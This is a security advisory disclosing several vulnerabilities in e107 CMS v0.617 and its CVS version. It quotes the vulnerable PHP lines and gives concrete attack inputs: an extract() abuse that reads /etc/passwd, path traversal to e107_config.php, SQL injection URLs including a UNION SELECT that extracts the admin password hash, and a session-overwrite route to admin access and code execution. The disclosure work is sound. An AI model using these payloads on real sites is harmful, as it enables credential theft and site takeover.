Software: http://www.e107.org Author: Heintz Advisory origin: http://www.waraxe.us Software bugtracker: http://e107.org/e107_plugins/bugtracker2/bugtracker2.php?0.bug.558 e107 v 0.617 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ search.php line ~ 142 if($_POST['searchquery']){ echo "
"; unset($text); extract($_POST); here extract() registeres and overwrites any variables in _POST array - this is worse than registered globals. few lines forward: if(file_exists($search_info[$key[$a]]['sfile'])){ @require_once($search_info[$key[$a]]['sfile']); $ns -> tablerender(LAN_195." ".$search_info[$key[$a]]['qtype']." : ".LAN_196.": ".$results, $text); } so we need to POST following variables: searchquery=aaa search_info[0][sfile]=/etc/passwd searchtype[0]=0 searchtype[1]=0 lets look forward top.php line ~79 sql queries before it has quotes around variable and those cant be braken out, but in this case there isnt need to send any quotes in variable: $replies = $sql2 -> db_Select("forum_t", "*", "thread_parent=$thread_id"); top.php?[INJECTION].active.all.[INJECTION] though this requires mysql version to support subqueries, to have any use of this. lets look more: when downloads are handled/sent by php (this option turned on) request.php ~87 send_file(e_FILE."public/".$download_url); when theres not "http://" or "ftp://" in file to be downloaded, then file is read and sent to user. request.php?../../e107_config.php ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ downloaded CVS and things are better but not enought, this advisory continues with CVS version of software. CVS is subject to change however. lets start with less dangerous features of software: e107_files/resetcore.php ~199 if (isset($_POST['reset_core_sub']) && $_POST['mode'] == 1) { $a_name = preg_replace('/\\W/i', '', $_POST['a_name']); $a_password = preg_replace('/\\W/i', '', $_POST['a_password']); if (!$result = mysql_query("SELECT * FROM ".$mySQLprefix."user WHERE user_name='{$a_name}' AND user_password='{$a_password}' AND user_perms=0")) { exit; } if reset_core_sub and mode variables are set and sql query syntax is ok, note i sayd query *syntax* - no data needs to retrieved with query. then we get cms core configuration as a good info which we are going into. lets move on forum_viewforum.php ~196 if($sql -> db_Select("forum_t", "*", "thread_forum_id='".$forum_id."' AND thread_parent='0' ORDER BY thread_s DESC, thread_lastpost DESC, thread_datestamp DESC LIMIT $from, $view")){ forum_viewforum.php?5.[INJECTION]# lets go on request.php line ~120 if ($type == "file") { $qry = " SELECT d.*, dc.download_category_class FROM #download as d LEFT JOIN #download_category AS dc ON dc.download_category_id = d.download_id WHERE d.download_id = $id; "; request.php?1/**/UNION/**/SELECT/**/null,null,concat(user_password,0x687474703A2F2F00),null,null, null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/FROM/**/e107_user/**/WHE RE/**/user_id=1 will try to redirect your browser to http:// in HTTP Location header. and on e107_handlers/upload_handler.php ~38 if ($pref['upload_storagetype'] == "2" && $avatar == FALSE) { extract($_FILES); for($c = 0; $c <= 1; $c++) with enought knowlege about HTTP it would be possible to "rewrite" _FILES to load local file to db (not very useful i guess, but read on) extract() is able to rewrite _SESSION array, this is disasterous because this is one array that is almost always trusted to contain valid data. so we can enter admin hash and id to it and we are admin, and this leads to own php code execution - which makes things real nasty. Greets ~~~~~~~ slimjim100, fulvioo, Gotisch, KuerbY, legion and Torufoorum. Special greets go to Waraxe.